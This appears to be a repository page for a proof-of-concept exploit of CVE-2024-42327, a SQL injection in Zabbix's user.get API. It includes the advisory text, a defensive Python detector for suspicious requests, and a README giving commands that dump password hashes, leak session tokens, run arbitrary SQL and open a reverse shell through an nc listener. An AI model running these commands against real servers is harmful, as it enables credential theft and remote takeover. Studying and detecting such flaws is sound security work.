CVE-2024-42327 PoC — SQL injection in user.get API

Associated Vulnerability
Title: SQL injection in user.get API (CVE-2024-42327)
Description: A non-admin user account on the Zabbix frontend with the default User role, or with any other role that gives API access, can exploit this vulnerability. An SQLi exists in the addRelatedObjects function of the CUser class; this function is called from the CUser.get function, which is available to every user who has API access.
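
A defender-side check for the API path described above, as an added example that is not from the advisory or the PoC repository: it scans captured JSON-RPC request bodies (for instance from a WAF or reverse-proxy log) and flags `user.get` calls whose parameters carry SQL-like text. The token list, the `exampleParam` field and the sample bodies are constructed for illustration and are assumptions, not values from the page.

```python
import json
import re

# Heuristic SQL tokens (an assumption for this example; tune before production use).
SQL_PATTERN = re.compile(
    r"(?i)\b(select|union|sleep|benchmark|information_schema)\b|--|/\*"
)

def iter_strings(node, path="params"):
    """Yield (path, text) for every string key and value nested in a JSON node."""
    if isinstance(node, str):
        yield path, node
    elif isinstance(node, dict):
        for key, value in node.items():
            yield f"{path}.{key}", key  # keys are caller-controlled too
            yield from iter_strings(value, f"{path}.{key}")
    elif isinstance(node, list):
        for index, value in enumerate(node):
            yield from iter_strings(value, f"{path}[{index}]")

def suspicious_user_get(raw_body):
    """Return sorted parameter paths of user.get calls that contain SQL-like text."""
    try:
        parsed = json.loads(raw_body)
    except json.JSONDecodeError:
        return []
    # JSON-RPC 2.0 allows a batch (array) of request objects; normalise to a list.
    calls = parsed if isinstance(parsed, list) else [parsed]
    hits = set()
    for call in calls:
        if isinstance(call, dict) and call.get("method") == "user.get":
            hits.update(p for p, text in iter_strings(call.get("params"))
                        if SQL_PATTERN.search(text))
    return sorted(hits)

# Constructed request bodies; "exampleParam" is a placeholder, not a real API field.
SAMPLES = [
    '{"jsonrpc":"2.0","method":"user.get","params":{"output":["userid","username"]},"id":1}',
    '{"jsonrpc":"2.0","method":"user.get","params":{"exampleParam":["name","SELECT version()"]},"id":2}',
    '{"jsonrpc":"2.0","method":"host.get","params":{"search":{"name":"select"}},"id":3}',
]

if __name__ == "__main__":
    for body in SAMPLES:
        print(suspicious_user_get(body) or "clean", "<-", body[:60])
```

A hit is a triage signal rather than proof of exploitation; correlate it with the calling account's role and the database error log.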
Description
This is for educational purposes only. Please do not use against unauthorized systems.
Readme
# 🛡️ Zabbix 7.0.0 SQL Injection Exploit Script

A Python script to exploit a **Zabbix 7.0.0** authenticated SQL injection vulnerability, supporting multiple modes of action including user data extraction, session token leaks, remote command execution (RCE), and custom query injection.

> ⚠️ **DISCLAIMER:**  
> This script is for **educational** and **authorized penetration testing** purposes only.  
> Do **not** use it on systems you do not own or have explicit permission to test.  
> The author is not responsible for any misuse or damage caused by this tool.

---

## ✨ Features

- ✅ Authenticated SQL Injection against Zabbix 7.0.0
- 🧑‍💻 Dump user hashes from the DB
- 🔐 Leak session tokens
- 🐚 Remote code execution via reverse shell (admin token required)
- 🧠 Run custom SQL queries

---

## 🔧 Requirements

- Python 3.6+
- `requests` library

Install requirements if needed:

```bash
pip install requests
```

## 🚀 Usage

```bash
python3 sqliZabbix.py -u <ZABBIX_URL> -U <USERNAME> -p <PASSWORD> --mode <MODE> [optional args...]
```


## 🔘 Available Modes

| Mode | Description | Requires Admin Token |
| ------------ | ------------ | ------------ |
| leak-users | Dumps all user IDs, usernames, password hashes, and roles | ❌ |
| leak-tokens | Dumps all active session IDs from the database | ❌ |
| rce | Spawns a reverse shell via item.create exploit | ✅ |
| custom | Run any custom SQL query via the injection | ❌ |


## 🧪 Examples
Dump User Hashes

```bash
python3 sqliZabbix.py -u http://target/zabbix/ -U guest -p guest --mode leak-users
```

Leak Session Tokens

```bash
python3 sqliZabbix.py -u http://target/zabbix/ -U guest -p guest --mode leak-tokens
```

Remote Code Execution (Reverse Shell)

```bash
# Start a listener first:
nc -lvnp 9001

# Then run:
python3 sqliZabbix.py -u http://target/zabbix/ -U guest -p guest --admin_token <ADMIN_API_TOKEN> --ip <YOUR_IP> --port 9001 --mode rce
```

Custom SQL Injection

```bash
python3 sqliZabbix.py -u http://target/zabbix/ -U guest -p guest --mode custom --query "SELECT version()"
```

## 📁 Project Structure

```bash
sqliZabbix.py      # Main exploit script
README.md          # This documentation
```
## 🧑‍💻 Author

Anthony (@874anthony)

Crafted with love & curiosity 🐍

## 🔐 License
This project is released under the MIT License. Please use responsibly.
File Snapshot

[4.0K] /data/pocs/8d773782fe4c9b62ec1446a853ff598423627407
├── [2.3K] README.md
└── [8.6K] sqliZabbix.py

0 directories, 2 files